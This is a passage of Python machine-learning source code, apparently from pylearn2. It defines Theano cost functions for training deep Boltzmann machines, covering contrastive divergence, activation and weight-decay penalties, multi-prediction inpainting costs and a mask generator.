e1 = model.energy(V_samples, [H1_mf, H2_samples, Y_mf]).mean()
e2 = model.energy(V_mf, [H1_samples, H2_mf, Y_samples]).mean()
expected_energy_p = 0.5 * (e1 + e2)
constants = flatten([V_samples, V_mf, H1_samples, H1_mf, H2_samples,
H2_mf, Y_mf, Y_samples])
neg_phase_grads = OrderedDict(safe_zip(params, T.grad(
-expected_energy_p, params, consider_constant=constants)))
for param in list(gradients.keys()):
gradients[param] = neg_phase_grads[param] + gradients[param]
return gradients, updates
class VariationalCD(DefaultDataSpecsMixin, BaseCD):
"""
An intractable cost representing the negative log likelihood of a DBM.
    The gradient of this bound is computed using a Markov chain initialized
with the training example.
Source: Hinton, G. Training Products of Experts by Minimizing
Contrastive Divergence
Parameters
----------
num_chains: int
Ignored, I guess?
num_gibbs_steps : int
The number of Gibbs steps to use in the negative phase. (i.e., if
you want to use CD-k or PCD-k, this is "k").
supervised : bool
        If True, requests class labels and models the joint distribution over
features and labels.
toronto_neg : bool
If True, use a bit of mean field in the negative phase.
Ruslan Salakhutdinov's matlab code does this.
theano_rng : MRG_RandomStreams, optional
If specified, uses this object to generate all random numbers.
Otherwise, makes its own random number generator.
"""
def _get_positive_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
"""
return self._get_variational_pos(model, X, Y), OrderedDict()
def _get_negative_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
d/d theta log Z = (d/d theta Z) / Z
= (d/d theta sum_h sum_v exp(-E(v,h)) ) / Z
= (sum_h sum_v - exp(-E(v,h)) d/d theta E(v,h) ) / Z
= - sum_h sum_v P(v,h) d/d theta E(v,h)
"""
layer_to_clamp = OrderedDict([(model.visible_layer, True)])
layer_to_chains = model.make_layer_to_symbolic_state(self.num_chains,
self.theano_rng)
# The examples are used to initialize the visible layer's chains
layer_to_chains[model.visible_layer] = X
# If we use supervised training, we need to make sure the targets are
# also clamped.
if self.supervised:
assert Y is not None
# note: if the Y layer changes to something without linear energy,
# we'll need to make the expected energy clamp Y in the positive
# phase
assert isinstance(model.hidden_layers[-1], Softmax)
layer_to_clamp[model.hidden_layers[-1]] = True
layer_to_chains[model.hidden_layers[-1]] = Y
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
# We first initialize the chain by clamping the visible layer and the
# target layer (if it exists)
layer_to_chains = model.sampling_procedure.sample(
layer_to_chains,
self.theano_rng,
layer_to_clamp=layer_to_clamp,
num_steps=1
)
# We then do the required mcmc steps
layer_to_chains = model.sampling_procedure.sample(
layer_to_chains,
self.theano_rng,
num_steps=self.num_gibbs_steps
)
if self.toronto_neg:
neg_phase_grads = self._get_toronto_neg(model, layer_to_chains)
else:
neg_phase_grads = self._get_standard_neg(model, layer_to_chains)
return neg_phase_grads, OrderedDict()
class MF_L1_ActCost(DefaultDataSpecsMixin, Cost):
"""
L1 activation cost on the mean field parameters.
Adds a cost of:
coeff * max( abs(mean_activation - target) - eps, 0)
averaged over units
for each layer.
Parameters
----------
targets : list
A list, one element per layer, specifying the activation each
layer should be encouraged to have.
Each element may also be a list depending on the structure of
the layer.
See each layer's get_l1_act_cost for a specification of what
the state should be.
coeffs: list
A list, one element per layer, specifying the coefficient
to put on the L1 activation cost for each layer.
supervised: bool
If true, runs mean field on both X and Y, penalizing
the layers in between only
"""
def __init__(self, targets, coeffs, eps, supervised):
self.__dict__.update(locals())
del self.self
@wraps(Cost.expr)
def expr(self, model, data, ** kwargs):
if self.supervised:
X, Y = data
H_hat = model.mf(X, Y=Y)
else:
X = data
H_hat = model.mf(X)
hidden_layers = model.hidden_layers
if self.supervised:
hidden_layers = hidden_layers[:-1]
H_hat = H_hat[:-1]
layer_costs = []
for layer, mf_state, targets, coeffs, eps in \
safe_zip(hidden_layers, H_hat, self.targets, self.coeffs,
self.eps):
cost = None
try:
cost = layer.get_l1_act_cost(mf_state, targets, coeffs, eps)
except NotImplementedError:
assert isinstance(coeffs, float) and coeffs == 0.
assert cost is None # if this gets triggered, there might
# have been a bug, where costs from lower layers got
# applied to higher layers that don't implement the cost
cost = None
if cost is not None:
layer_costs.append(cost)
assert T.scalar() != 0. # make sure theano semantics do what I want
layer_costs = [cost_ for cost_ in layer_costs if cost_ != 0.]
if len(layer_costs) == 0:
return T.as_tensor_variable(0.)
else:
total_cost = reduce(operator.add, layer_costs)
total_cost.name = 'MF_L1_ActCost'
assert total_cost.ndim == 0
return total_cost
class MF_L2_ActCost(DefaultDataSpecsMixin, Cost):
"""
An L2 penalty on the amount that the hidden unit mean field parameters
deviate from desired target values.
Parameters
----------
targets : list
A list, one element per layer, specifying the activation each
layer should be encouraged to have.
Each element may also be a list depending on the structure of
the layer.
See each layer's get_l2_act_cost for a specification of what
the state should be.
coeffs: list
A list, one element per layer, specifying the coefficient
to put on the L2 activation cost for each layer.
supervised: bool
If true, runs mean field on both X and Y, penalizing
the layers in between only
"""
def __init__(self, targets, coeffs, supervised=False):
targets = fix(targets)
coeffs = fix(coeffs)
self.__dict__.update(locals())
del self.self
def expr(self, model, data, return_locals=False, **kwargs):
"""
Returns the expression for the Cost.
Parameters
----------
model : Model
data : Batch in get_data_specs format
return_locals : bool
If returns locals is True, returns (objective, locals())
Note that this means adding / removing / changing the value of
local variables is an interface change.
In particular, TorontoSparsity depends on "terms" and "H_hat"
kwargs : optional keyword arguments for FixedVarDescr
"""
self.get_data_specs(model)[0].validate(data)
if self.supervised:
(X, Y) = data
else:
X = data
Y = None
H_hat = model.mf(X, Y=Y)
terms = []
hidden_layers = model.hidden_layers
# if self.supervised:
# hidden_layers = hidden_layers[:-1]
for layer, mf_state, targets, coeffs in \
safe_zip(hidden_layers, H_hat, self.targets, self.coeffs):
try:
cost = layer.get_l2_act_cost(mf_state, targets, coeffs)
except NotImplementedError:
if isinstance(coeffs, float) and coeffs == 0.:
cost = 0.
else:
raise
terms.append(cost)
objective = sum(terms)
if return_locals:
return objective, locals()
return objective
def fix(l):
"""
Turns (lists of) strings into (lists of) floats.
Parameters
----------
l : object
Returns
-------
l : object
If `l` is anything but a string, the return is the
same as the input, but it may have been modified in place.
If `l` is a string, the return value is `l` converted to a float.
If `l` is a list, this function explores all nested lists inside
`l` and turns all string members into floats.
"""
if isinstance(l, list):
return [fix(elem) for elem in l]
if isinstance(l, str):
return float(l)
return l
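# Example: fix(["0.1", ["2", 3.0]]) returns [0.1, [2.0, 3.0]].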
class TorontoSparsity(Cost):
"""
A somewhat strange sparsity penalty borrowed from Ruslan
Salakhutdinov's MATLAB MNIST DBM demo.
It's an activation penalty using mean squared error on
the activations, except to backprop from the activations
to the parameters we pretend the model was partially linear.
TODO: add link to Ruslan Salakhutdinov's paper that this is based on
Parameters
----------
targets : list
A list of ideal activation values for each layer
coeffs : list
A list of coefficients for the penalty on each layer
supervised: bool
If True, the last layer of the model is the layer
representing the targets, and this class should ignore
it.
"""
def __init__(self, targets, coeffs, supervised=False):
self.__dict__.update(locals())
del self.self
self.base_cost = MF_L2_ActCost(targets=targets,
coeffs=coeffs, supervised=supervised)
@wraps(Cost.expr)
def expr(self, model, data, return_locals=False, **kwargs):
self.get_data_specs(model)[0].validate(data)
return self.base_cost.expr(model, data, return_locals=return_locals,
**kwargs)
@wraps(Cost.get_gradients)
def get_gradients(self, model, data, **kwargs):
self.get_data_specs(model)[0].validate(data)
obj, scratch = self.base_cost.expr(model, data, return_locals=True,
**kwargs)
if self.supervised:
assert isinstance(data, (list, tuple))
assert len(data) == 2
(X, Y) = data
else:
X = data
H_hat = scratch['H_hat']
terms = scratch['terms']
hidden_layers = scratch['hidden_layers']
grads = OrderedDict()
assert len(H_hat) == len(terms)
assert len(terms) == len(hidden_layers)
num_layers = len(hidden_layers)
for i in xrange(num_layers):
state = H_hat[i]
layer = model.hidden_layers[i]
term = terms[i]
if term == 0.:
continue
else:
logger.info('term is {0}'.format(term))
if i == 0:
state_below = X
layer_below = model.visible_layer
else:
layer_below = model.hidden_layers[i - 1]
state_below = H_hat[i - 1]
state_below = layer_below.upward_state(state_below)
components = flatten(state)
real_grads = T.grad(term, components)
fake_state = layer.linear_feed_forward_approximation(state_below)
fake_components = flatten(fake_state)
real_grads = OrderedDict(safe_zip(fake_components, real_grads))
params = list(layer.get_params())
fake_grads = pylearn2.utils.grad(
cost=None,
consider_constant=flatten(state_below),
wrt=params,
known_grads=real_grads
)
for param, grad in safe_zip(params, fake_grads):
if param in grads:
grads[param] = grads[param] + grad
else:
grads[param] = grad
return grads, OrderedDict()
@wraps(Cost.get_data_specs)
def get_data_specs(self, model):
return self.base_cost.get_data_specs(model)
class WeightDecay(NullDataSpecsMixin, Cost):
"""
A Cost that applies the following cost function:
coeff * sum(sqr(weights))
for each set of weights.
Parameters
----------
coeffs : list
One element per layer, specifying the coefficient
        to put on the weight decay cost for each layer.
Each element may in turn be a list, ie, for CompositeLayers.
"""
def __init__(self, coeffs):
self.__dict__.update(locals())
del self.self
@wraps(Cost.expr)
def expr(self, model, data, ** kwargs):
self.get_data_specs(model)[0].validate(data)
layer_costs = [layer.get_weight_decay(coeff)
for layer, coeff in safe_izip(model.hidden_layers,
self.coeffs)]
assert T.scalar() != 0. # make sure theano semantics do what I want
layer_costs = [cost for cost in layer_costs if cost != 0.]
if len(layer_costs) == 0:
rval = T.as_tensor_variable(0.)
rval.name = '0_weight_decay'
return rval
else:
total_cost = reduce(operator.add, layer_costs)
total_cost.name = 'DBM_WeightDecay'
assert total_cost.ndim == 0
total_cost.name = 'weight_decay'
return total_cost
class MultiPrediction(DefaultDataSpecsMixin, Cost):
"""
If you use this class in your research work, please cite:
Multi-prediction deep Boltzmann machines. Ian J. Goodfellow, Mehdi Mirza,
Aaron Courville, and Yoshua Bengio. NIPS 2013.
Parameters
----------
monitor_multi_inference : bool
If True, produce extra monitoring channels tracking the performance
of the multi inference trick during learning.
mask_gen : MaskGen
The object used to generate the masking patterns that determine which
units are inputs and which units are targets each time we load another
minibatch of data.
noise : bool
Passed through to the DBM's `do_inpainting` method
both_directions : bool
If True, construct two versions of the log pseudolikelihood and average
them together to make the total cost. The second log pseudolikelihood
uses the inputs from the first version as targets and vice versa.
l1_act_coeffs : list
List of L1 activation coefficients. This is different from using
MF_L1ActCost because it is applied directly to the activations used
during multi-prediction training, rather than to mean field inference
on fully observed input vectors.
l1_act_targets : list
List of L1 activation targets.
l1_act_eps : list
List of epsilon values for epsilon insensitive L1 activity
regularization.
range_rewards : list
List of coefficients on a negative "cost" that rewards units whose
range is greater.
std_rewards: list
Same but for standard deviation rather than range
robustness : bool
If True, add a penalty encouraging the representation to
be similar for two different masks.
supervised : bool
If True, also model the class label.
niter : int, optional
Number of iterations to run mean field inference
block_grad : int, optional
Don't backprop through the first n iterations
vis_presynaptic_cost: WRITEME
hid_presynaptic_cost: WRITEME
reweighted_act_coeffs: WRITEME
reweighted_act_targets: WRITEME
toronto_act_targets: list
List of targets for Toronto-style activation regularization
of multi-prediction activations
toronto_act_coeffs : list
List of coefficients for Toronto-style activation regularization
monitor_each_step : bool
If True, monitor every step of inference, rather than just the outcome
use_sum : WRITEME
"""
def __init__(self,
monitor_multi_inference=False,
mask_gen=None,
noise=False,
both_directions=False,
l1_act_coeffs=None,
l1_act_targets=None,
l1_act_eps=None,
range_rewards=None,
stdev_rewards=None,
robustness=None,
supervised=False,
niter=None,
block_grad=None,
vis_presynaptic_cost=None,
hid_presynaptic_cost=None,
reweighted_act_coeffs=None,
reweighted_act_targets=None,
toronto_act_targets=None,
toronto_act_coeffs=None,
monitor_each_step=False,
use_sum=False):
self.__dict__.update(locals())
del self.self
@wraps(Cost.get_monitoring_channels)
def get_monitoring_channels(self, model, data, drop_mask=None,
drop_mask_Y=None, **kwargs):
if self.supervised:
X, Y = data
else:
X = data
Y = None
if self.supervised:
assert Y is not None
rval = OrderedDict()
# TODO: shouldn't self() handle this?
if drop_mask is not None and drop_mask.ndim < X.ndim:
if self.mask_gen is not None:
assert self.mask_gen.sync_channels
if X.ndim != 4:
raise NotImplementedError()
drop_mask = drop_mask.dimshuffle(0, 1, 2, 'x')
if Y is None:
data = X
else:
data = (X, Y)
scratch = self.expr(model, data, drop_mask=drop_mask,
drop_mask_Y=drop_mask_Y,
return_locals=True)
history = scratch['history']
new_history = scratch['new_history']
new_drop_mask = scratch['new_drop_mask']
new_drop_mask_Y = None
drop_mask = scratch['drop_mask']
if self.supervised:
drop_mask_Y = scratch['drop_mask_Y']
new_drop_mask_Y = scratch['new_drop_mask_Y']
ii = 0
for name in ['inpaint_cost', 'l1_act_cost', 'toronto_act_cost',
'reweighted_act_cost']:
var = scratch[name]
if var is not None:
rval['total_inpaint_cost_term_' + str(ii) + '_' + name] = var
ii = ii + 1
if self.monitor_each_step:
for ii, packed in enumerate(safe_izip(history, new_history)):
state, new_state = packed
c = self.cost_from_states(state,
new_state, model, X, Y, drop_mask,
drop_mask_Y, new_drop_mask,
new_drop_mask_Y)
rval['all_inpaint_costs_after_' + str(ii)] = c
if ii > 0:
prev_state = history[ii - 1]
V_hat = state['V_hat']
prev_V_hat = prev_state['V_hat']
rval['max_pixel_diff[%d]' % ii] = abs(
V_hat - prev_V_hat).max()
final_state = history[-1]
# empirical beta code--should be moved to gaussian visible layer,
# should support topo data
# V_hat = final_state['V_hat']
# err = X - V_hat
# masked_err = err * drop_mask
# sum_sqr_err = T.sqr(masked_err).sum(axis=0)
# recons_count = T.cast(drop_mask.sum(axis=0), 'float32')
# empirical_beta = recons_count / sum_sqr_err
# assert empirical_beta.ndim == 1
# rval['empirical_beta_min'] = empirical_beta.min()
# rval['empirical_beta_mean'] = empirical_beta.mean()
# rval['empirical_beta_max'] = empirical_beta.max()
layers = model.get_all_layers()
states = [final_state['V_hat']] + final_state['H_hat']
for layer, state in safe_izip(layers, states):
d = layer.get_monitoring_channels_from_state(state)
for key in d:
mod_key = 'final_inpaint_' + layer.layer_name + '_' + key
assert mod_key not in rval
rval[mod_key] = d[key]
if self.supervised:
inpaint_Y_hat = history[-1]['H_hat'][-1]
err = T.neq(T.argmax(inpaint_Y_hat, axis=1), T.argmax(Y, axis=1))
assert err.ndim == 1
assert drop_mask_Y.ndim == 1
err = T.dot(err, drop_mask_Y) / drop_mask_Y.sum()
if err.dtype != inpaint_Y_hat.dtype:
err = T.cast(err, inpaint_Y_hat.dtype)
rval['inpaint_err'] = err
Y_hat = model.mf(X)[-1]
Y = T.argmax(Y, axis=1)
Y = T.cast(Y, Y_hat.dtype)
argmax = T.argmax(Y_hat, axis=1)
if argmax.dtype != Y_hat.dtype:
argmax = T.cast(argmax, Y_hat.dtype)
err = T.neq(Y, argmax).mean()
if err.dtype != Y_hat.dtype:
err = T.cast(err, Y_hat.dtype)
rval['err'] = err
if self.monitor_multi_inference:
Y_hat = model.inference_procedure.multi_infer(X)
argmax = T.argmax(Y_hat, axis=1)
if argmax.dtype != Y_hat.dtype:
argmax = T.cast(argmax, Y_hat.dtype)
err = T.neq(Y, argmax).mean()
if err.dtype != Y_hat.dtype:
err = T.cast(err, Y_hat.dtype)
rval['multi_err'] = err
return rval
@wraps(Cost.expr)
def expr(self, model, data, drop_mask=None, drop_mask_Y=None,
return_locals=False, include_toronto=True, ** kwargs):
if self.supervised:
X, Y = data
else:
X = data
Y = None
if not self.supervised:
assert drop_mask_Y is None
# ignore Y if some other cost is supervised and has made it get
# passed in (can this still happen after the (space, source)
# interface change?)
Y = None
if self.supervised:
assert Y is not None
if drop_mask is not None:
assert drop_mask_Y is not None
if not hasattr(model, 'cost'):
model.cost = self
if not hasattr(model, 'mask_gen'):
model.mask_gen = self.mask_gen
dbm = model
X_space = model.get_input_space()
if drop_mask is None:
if self.supervised:
drop_mask, drop_mask_Y = self.mask_gen(X, Y, X_space=X_space)
else:
drop_mask = self.mask_gen(X, X_space=X_space)
if drop_mask_Y is not None:
assert drop_mask_Y.ndim == 1
if drop_mask.ndim < X.ndim:
if self.mask_gen is not None:
assert self.mask_gen.sync_channels
if X.ndim != 4:
raise NotImplementedError()
drop_mask = drop_mask.dimshuffle(0, 1, 2, 'x')
if not hasattr(self, 'noise'):
self.noise = False
history = dbm.do_inpainting(X, Y=Y, drop_mask=drop_mask,
drop_mask_Y=drop_mask_Y,
return_history=True,
noise=self.noise,
niter=self.niter,
block_grad=self.block_grad)
final_state = history[-1]
new_drop_mask = None
new_drop_mask_Y = None
new_history = [None for state in history]
if not hasattr(self, 'both_directions'):
self.both_directions = False
if self.both_directions:
new_drop_mask = 1. - drop_mask
if self.supervised:
new_drop_mask_Y = 1. - drop_mask_Y
            di = dbm.do_inpainting
new_history = di(X, Y=Y,
drop_mask=new_drop_mask,
drop_mask_Y=new_drop_mask_Y, return_history=True,
noise=self.noise,
niter=self.niter, block_grad=self.block_grad)
new_final_state = new_history[-1]
cfs = self.cost_from_states
out = cfs(final_state, new_final_state, dbm, X, Y, drop_mask,
drop_mask_Y, new_drop_mask, new_drop_mask_Y,
return_locals=True)
total_cost, sublocals = out
l1_act_cost = sublocals['l1_act_cost']
inpaint_cost = sublocals['inpaint_cost']
reweighted_act_cost = sublocals['reweighted_act_cost']
if not hasattr(self, 'robustness'):
self.robustness = None
if self.robustness is not None:
inpainting_H_hat = history[-1]['H_hat']
mf_H_hat = dbm.mf(X, Y=Y)
if self.supervised:
inpainting_H_hat = inpainting_H_hat[:-1]
mf_H_hat = mf_H_hat[:-1]
for ihh, mhh in safe_izip(flatten(inpainting_H_hat),
flatten(mf_H_hat)):
total_cost += self.robustness * T.sqr(mhh - ihh).sum()
if not hasattr(self, 'toronto_act_targets'):
self.toronto_act_targets = None
toronto_act_cost = None
if self.toronto_act_targets is not None and include_toronto:
toronto_act_cost = 0.
H_hat = history[-1]['H_hat']
for s, c, t in zip(H_hat, self.toronto_act_coeffs,
self.toronto_act_targets):
if c == 0.:
continue
s, _ = s
m = s.mean(axis=0)
toronto_act_cost += c * T.sqr(m - t).mean()
total_cost += toronto_act_cost
if return_locals:
return locals()
total_cost.name = 'total_inpaint_cost'
return total_cost
def get_fixed_var_descr(self, model, data):
"""
Returns the FixedVarDescr object responsible for making sure the
masks that determine which units are inputs and outputs are generated
each time a minibatch is loaded.
Parameters
----------
model : DBM
data : Batch in get_data_specs format
"""
X, Y = data
assert Y is not None
batch_size = model.batch_size
drop_mask_X = sharedX(
model.get_input_space().get_origin_batch(batch_size))
drop_mask_X.name = 'drop_mask'
X_space = model.get_input_space()
updates = OrderedDict()
rval = FixedVarDescr()
inputs = [X, Y]
if not self.supervised:
update_X = self.mask_gen(X, X_space=X_space)
else:
drop_mask_Y = sharedX(np.ones(batch_size,))
drop_mask_Y.name = 'drop_mask_Y'
update_X, update_Y = self.mask_gen(X, Y, X_space)
updates[drop_mask_Y] = update_Y
rval.fixed_vars['drop_mask_Y'] = drop_mask_Y
if self.mask_gen.sync_channels:
n = update_X.ndim
assert n == drop_mask_X.ndim - 1
update_X.name = 'raw_update_X'
zeros_like_X = T.zeros_like(X)
zeros_like_X.name = 'zeros_like_X'
update_X = zeros_like_X + update_X.dimshuffle(0, 1, 2, 'x')
update_X.name = 'update_X'
updates[drop_mask_X] = update_X
rval.fixed_vars['drop_mask'] = drop_mask_X
if hasattr(model.inference_procedure, 'V_dropout'):
include_prob = model.inference_procedure.include_prob
include_prob_V = model.inference_procedure.include_prob_V
include_prob_Y = model.inference_procedure.include_prob_Y
theano_rng = make_theano_rng(None, 2012 + 10 + 20,
which_method="binomial")
for elem in flatten([model.inference_procedure.V_dropout]):
updates[elem] = theano_rng.binomial(p=include_prob_V,
size=elem.shape,
dtype=elem.dtype,
n=1) / include_prob_V
if "Softmax" in str(type(model.hidden_layers[-1])):
hid = model.inference_procedure.H_dropout[:-1]
y = model.inference_procedure.H_dropout[-1]
updates[y] = theano_rng.binomial(p=include_prob_Y,
size=y.shape, dtype=y.dtype,
n=1) / include_prob_Y
else:
hid = model.inference_procedure.H_dropout
for elem in flatten(hid):
updates[elem] = theano_rng.binomial(p=include_prob,
size=elem.shape,
dtype=elem.dtype,
n=1) / include_prob
rval.on_load_batch = [utils.function(inputs, updates=updates)]
return rval
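    # --- Editor's note (illustrative, not part of the original source) ---
    # The training algorithm calls the descriptor's on_load_batch function
    # once per minibatch; conceptually:
    #     descr = cost.get_fixed_var_descr(model, (X_batch, Y_batch))
    #     descr.on_load_batch[0](X_batch, Y_batch)  # resamples drop masks
    # so the shared drop_mask / drop_mask_Y variables are refreshed before
    # each gradient step.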
@wraps(Cost.get_gradients)
def get_gradients(self, model, X, Y=None, **kwargs):
if Y is None:
data = X
else:
data = (X, Y)
scratch = self.expr(model, data, include_toronto=False,
return_locals=True, **kwargs)
total_cost = scratch['total_cost']
params = list(model.get_params())
grads = dict(safe_zip(params, T.grad(total_cost, params,
disconnected_inputs='ignore')))
if self.toronto_act_targets is not None:
H_hat = scratch['history'][-1]['H_hat']
for i, packed in enumerate(safe_zip(H_hat,
self.toronto_act_coeffs,
self.toronto_act_targets)):
s, c, t = packed
if c == 0.:
continue
s, _ = s
m = s.mean(axis=0)
m_cost = c * T.sqr(m - t).mean()
real_grads = T.grad(m_cost, s)
if i == 0:
below = X
else:
below = H_hat[i - 1][0]
W, = model.hidden_layers[i].transformer.get_params()
assert W in grads
b = model.hidden_layers[i].b
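                # Editor's note: the block below is a deliberate shortcut.
                # `ancestor` is a dummy scalar whose only purpose is to make
                # hack_W / hack_b fresh graph nodes, and known_grads assigns
                # the penalty's gradient w.r.t. the post-sigmoid state
                # directly to the pre-sigmoid expression fake_s, so T.grad
                # yields cheap approximate gradients for W and b without
                # differentiating through the unrolled inference.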
ancestor = T.scalar()
hack_W = W + ancestor
hack_b = b + ancestor
fake_s = T.dot(below, hack_W) + hack_b
if fake_s.ndim != real_grads.ndim:
logger.error(fake_s.ndim)
logger.error(real_grads.ndim)
assert False
sources = [(fake_s, real_grads)]
fake_grads = T.grad(cost=None, known_grads=dict(sources),
wrt=[below, ancestor, hack_W, hack_b])
grads[W] = grads[W] + fake_grads[2]
grads[b] = grads[b] + fake_grads[3]
return grads, OrderedDict()
def get_inpaint_cost(self, dbm, X, V_hat_unmasked, drop_mask, state,
Y, drop_mask_Y):
"""
        Returns the generalized pseudolikelihood given raw data, a mask,
        and the output of inference.
        Parameters
        ----------
        dbm : DBM
        X : tensor_like
            A batch of inputs.
        V_hat_unmasked : tensor_like
            A batch of reconstructions of X.
        drop_mask : tensor_like
            A batch of mask values.
        state : OrderedDict
            Hidden states of the DBM.
        Y : tensor_like
            A batch of labels.
        drop_mask_Y : tensor_like
            A batch of Y mask values.
        """
rval = dbm.visible_layer.recons_cost(X, V_hat_unmasked, drop_mask,
use_sum=self.use_sum)
if self.supervised:
# pyflakes is too dumb to see that both branches define `scale`
scale = None
if self.use_sum:
scale = 1.
else:
scale = 1. / float(dbm.get_input_space().get_total_dimension())
Y_hat_unmasked = state['Y_hat_unmasked']
rc = dbm.hidden_layers[-1].recons_cost
rval = rval + rc(Y, Y_hat_unmasked, drop_mask_Y, scale)
return rval
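    # --- Editor's sketch (an assumption-laden illustration, not part of the
    # original source): conceptually, the masked reconstruction cost above
    # only scores units with drop_mask == 1 (the dropped prediction
    # targets), e.g. for a squared-error visible layer something like
    #     T.sqr(drop_mask * (X - V_hat_unmasked)).sum()
    # optionally rescaled by the total input dimension; the exact expression
    # is delegated to each layer's recons_cost method.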
def cost_from_states(self, state, new_state, dbm, X, Y, drop_mask,
drop_mask_Y, new_drop_mask, new_drop_mask_Y,
return_locals=False):
"""
Returns the total cost, given the states produced by inference.
This includes activity regularization costs, not just generalized
pseudolikelihood costs.
Parameters
----------
        state : OrderedDict
            The state of the model after inference.
        new_state : OrderedDict
            The state of the model after inference with a different mask.
        dbm : DBM
        X : tensor_like
            A batch of input pixels.
        Y : tensor_like
            A batch of output labels.
        drop_mask : tensor_like
            A batch of mask values determining which pixels are inputs.
        drop_mask_Y : Theano matrix
            A batch of mask values determining which labels are inputs.
        new_drop_mask : tensor_like
            The second mask.
        new_drop_mask_Y : tensor_like
            The second label mask.
return_locals : bool
If True, return all local variables
Returns
-------
cost : Theano expression for the cost
locals : Optional
If return_locals is True, returns the dictionary of all local
variables. Note that this means all implementation changes are
now API changes.
"""
if not self.supervised:
assert drop_mask_Y is None
assert new_drop_mask_Y is None
if self.supervised:
assert drop_mask_Y is not None
if self.both_directions:
assert new_drop_mask_Y is not None
assert Y is not None
V_hat_unmasked = state['V_hat_unmasked']
assert V_hat_unmasked.ndim == X.ndim
if not hasattr(self, 'use_sum'):
self.use_sum = False
inpaint_cost = self.get_inpaint_cost(dbm, X, V_hat_unmasked, drop_mask,
state, Y, drop_mask_Y)
if not hasattr(self, 'both_directions'):
self.both_directions = False
assert self.both_directions == (new_state is not None)
if new_state is not None:
new_V_hat_unmasked = new_state['V_hat_unmasked']
rc = dbm.visible_layer.recons_cost
new_inpaint_cost = rc(X, new_V_hat_unmasked, new_drop_mask)
if self.supervised:
new_Y_hat_unmasked = new_state['Y_hat_unmasked']
scale = None
raise NotImplementedError("This branch appears to be broken,"
"needs to define scale.")
new_inpaint_cost = new_inpaint_cost + \
dbm.hidden_layers[-1].recons_cost(Y,
new_Y_hat_unmasked,
new_drop_mask_Y, scale)
# end if include_Y
inpaint_cost = 0.5 * inpaint_cost + 0.5 * new_inpaint_cost
# end if both directions
total_cost = inpaint_cost
if not hasattr(self, 'range_rewards'):
self.range_rewards = None
if self.range_rewards is not None:
for layer, mf_state, coeffs in safe_izip(
dbm.hidden_layers,
state['H_hat'],
self.range_rewards):
try:
layer_cost = layer.get_range_rewards(mf_state, coeffs)
except NotImplementedError:
if coeffs == 0.:
layer_cost = 0.
else:
raise
if layer_cost != 0.:
total_cost += layer_cost
if not hasattr(self, 'stdev_rewards'):
self.stdev_rewards = None
if self.stdev_rewards is not None:
assert False # not monitored yet
for layer, mf_state, coeffs in safe_izip(
dbm.hidden_layers,
state['H_hat'],
self.stdev_rewards):
try:
layer_cost = layer.get_stdev_rewards(mf_state, coeffs)
except NotImplementedError:
if coeffs == 0.:
layer_cost = 0.
else:
raise
if layer_cost != 0.:
total_cost += layer_cost
l1_act_cost = None
if self.l1_act_targets is not None:
l1_act_cost = 0.
if self.l1_act_eps is None:
self.l1_act_eps = [None] * len(self.l1_act_targets)
for layer, mf_state, targets, coeffs, eps in \
safe_izip(dbm.hidden_layers, state['H_hat'],
self.l1_act_targets, self.l1_act_coeffs,
self.l1_act_eps):
assert not isinstance(targets, str)
try:
layer_cost = layer.get_l1_act_cost(mf_state, targets,
coeffs, eps)
except NotImplementedError:
if coeffs == 0.:
layer_cost = 0.
else:
raise
if layer_cost != 0.:
l1_act_cost += layer_cost
# end for substates
# end for layers
total_cost += l1_act_cost
# end if act penalty
if not hasattr(self, 'hid_presynaptic_cost'):
self.hid_presynaptic_cost = None
if self.hid_presynaptic_cost is not None:
assert False # not monitored yet
for c, s, in safe_izip(self.hid_presynaptic_cost, state['H_hat']):
if c == 0.:
continue
s = s[1]
assert hasattr(s, 'owner')
owner = s.owner
assert owner is not None
op = owner.op
if not hasattr(op, 'scalar_op'):
raise ValueError("Expected V_hat_unmasked to be generated"
"by an Elemwise op, got " + str(op)
+ " of type " + str(type(op)))
assert isinstance(op.scalar_op, T.nnet.sigm.ScalarSigmoid)
z, = owner.inputs
total_cost += c * T.sqr(z).mean()
if not hasattr(self, 'reweighted_act_targets'):
self.reweighted_act_targets = None
reweighted_act_cost = None
if self.reweighted_act_targets is not None:
reweighted_act_cost = 0.
warnings.warn("reweighted_act_cost is hardcoded for sigmoid "
"layers and doesn't check that this is what we get.")
for c, t, s in safe_izip(self.reweighted_act_coeffs,
self.reweighted_act_targets,
state['H_hat']):
if c == 0:
continue
s, _ = s
m = s.mean(axis=0)
d = T.sqr(m - t)
weight = 1. / (1e-7 + s * (1 - s))
reweighted_act_cost += c * (weight * d).mean()
total_cost += reweighted_act_cost
total_cost.name = 'total_cost(V_hat_unmasked = %s)' % \
V_hat_unmasked.name
if return_locals:
return total_cost, locals()
return total_cost
default_seed = 20120712
class MaskGen(object):
"""
A class that generates masks for multi-prediction training.
Parameters
----------
drop_prob : float
The probability of dropping out a unit (making it a target of
the training criterion)
    balance : bool
        If True, choose each example's drop probability uniformly at random
        to be either `drop_prob` or `1 - drop_prob`, so that on average half
        of the units in the batch are dropped regardless of `drop_prob`.
sync_channels : bool
If True:
Rather than dropping each pixel individually, drop spatial locations.
i.e., we either drop the red, the green, and the blue pixel at (x, y),
or we drop nothing at (x, y).
If False:
Drop each pixel independently.
drop_prob_y : float, optional
If specified, use a different drop probability for the class labels.
seed : int
The seed to use with MRG_RandomStreams for generating the random
masks.
"""
def __init__(self, drop_prob, balance=False, sync_channels=True,
drop_prob_y=None, seed=default_seed):
self.__dict__.update(locals())
del self.self
def __call__(self, X, Y=None, X_space=None):
"""
        Provides the mask for multi-prediction training. A 1 in the mask
        marks a variable that is dropped out, i.e. used as a prediction
        target of the multi-prediction training criterion. A 0 marks a
        variable that stays visible and is used as an input to the
        inference process.
Parameters
----------
X : Variable
A batch of input features to mask for multi-prediction training
Y : Variable
A batch of input class labels to mask for multi-prediction
            training
Returns
-------
drop_mask : Variable
A Theano expression for a random binary mask in the same shape as
`X`
drop_mask_Y : Variable, only returned if `Y` is not None
A Theano expression for a random binary mask in the same shape as
`Y`
Notes
-----
Calling this repeatedly will yield the same random numbers each time.
"""
assert X_space is not None
self.called = True
assert X.dtype == config.floatX
theano_rng = make_theano_rng(getattr(self, 'seed', None), default_seed,
which_method="binomial")
if X.ndim == 2 and self.sync_channels:
raise NotImplementedError()
p = self.drop_prob
if not hasattr(self, 'drop_prob_y') or self.drop_prob_y is None:
yp = p
else:
yp = self.drop_prob_y
batch_size = X_space.batch_size(X)
if self.balance:
